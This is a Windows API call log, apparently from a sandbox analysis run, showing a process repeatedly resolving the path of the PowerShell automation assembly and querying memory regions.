	[0283.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.591] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x40c2837e, Data2=0xabf6, Data3=0x47e0, Data4=([0]=0x9d, [1]=0xdf, [2]=0x61, [3]=0x2, [4]=0x5e, [5]=0x73, [6]=0x1a, [7]=0x7e))) returned 0x0
	[0284.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.594] VirtualQuery (in: lpAddress=0xcb660, lpBuffer=0xcc520, dwLength=0x30 | out: lpBuffer=0xcc520*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.594] VirtualQuery (in: lpAddress=0xcb6f0, lpBuffer=0xcc5b0, dwLength=0x30 | out: lpBuffer=0xcc5b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.595] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.596] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.596] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.597] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.597] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.597] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.597] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.597] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.597] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.597] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.598] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.598] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.598] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.598] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.598] VirtualQuery (in: lpAddress=0xcbaa0, lpBuffer=0xcc960, dwLength=0x30 | out: lpBuffer=0xcc960*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.598] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.598] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.598] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.599] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.599] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x2bec40c9, Data2=0x88d4, Data3=0x407f, Data4=([0]=0x8f, [1]=0x80, [2]=0x4c, [3]=0x70, [4]=0xd2, [5]=0x3c, [6]=0x49, [7]=0x2e))) returned 0x0
	[0284.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
